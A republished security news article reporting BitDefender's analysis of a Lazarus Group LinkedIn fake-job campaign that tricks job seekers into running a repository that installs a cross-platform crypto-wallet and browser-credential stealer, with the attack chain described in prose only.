North Korea-linked Lazarus Group is duping job seekers and professionals in an ongoing campaign that runs a LinkedIn recruiting scam to capture browser credentials, steal crypto wallet data, and launch persistence.According to a discovery made by BitDefender Labs, threat actors reach out with fake LinkedIn job offers to lure the victims into downloading and executing a JavaScript info-stealer from a third-party endpoint.”Our researchers noted that the payload is a cross-platform info-stealer that can be deployed on Windows, MacOS and Linux operating systems,” BitDefender researchers said in a blog post. “This info-stealer is engineered to target a range of popular cryptocurrency wallets by looking up for the crypto-related browsing extensions with (a list of) IDs.”Analysis of the malware and operational tactics helped the researchers link the campaign to North Korean threat actors, specifically APT38 based on the group’s previous campaigns around fake job offers and applications. Quite interestingly, the discovery was made possible by the campaign operators themselves as they, by mistake, sent out a job offer to one of the BitDefender researchers.The blog post added that the campaign began with an enticing LinkedIn message offering to collaborate on a decentralized cryptocurrency exchange. On interest, the recipient was requested for a CV or a personal Github link, that could themselves be used for nefarious activities, which then led to the criminal sharing a repository containing the “minimum viable product” (MVP) of the fake crypto project.A document with questions was also sent along which could only be answered by executing the demo prompted on the repository link, which in turn initiates the malware dropper, the blog post added.Various LinkedIn and Reddit users have separately reported similar activities, with the attackers asking them to either clone the malicious repository and run it locally or fix bugs in its codes. BitDefender is warning against the red flags associated with this campaign, including vague job descriptions, suspicious repositories, and poor communication, to help individuals protect themselves.A similar attack was reported earlier this week, where DPRK-backed threat actors were found using a new variant of the macOS Ferret family malware for their “Contagious Interviews” campaign.
Layered attack chain for crypto-theft and credential stealing
The payload used by the attackers was observed to be a cross-platform info-stealer targeted at cryptocurrency wallets. On execution, the stealer collects important crypto files, and login data of the browsers used and sends them to a server that, researchers noted, already had unrelated malicious data.After primary exfiltration, the stealer downloads and executes a secondary Python script, main99_65.py, that has dedicated functions for malicious activities, including harvesting and extracting crypto-related data (mlip.py), maintaining persistence (pay.py), and collecting sensitive browser data such as logins and payment info (bow.py).Another payload (.NET binary) drops dependencies on the victim’s system that add malicious scripts for modifying the Microsoft Defender exception list, and establishing C2 communications. It also has a binary for enabling the download of an additional executable that has multiple malware modules including backdoors, stealers, crypto-miners, and key-loggers. “The threat actors’ infection chain is complex, containing malicious software written in multiple programming languages and using a variety of technologies, such as multi-layered Python scripts,” the researchers said.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/3818521/lazarus-group-tricks-job-seekers-on-linkedin-with-crypto-stealer.html
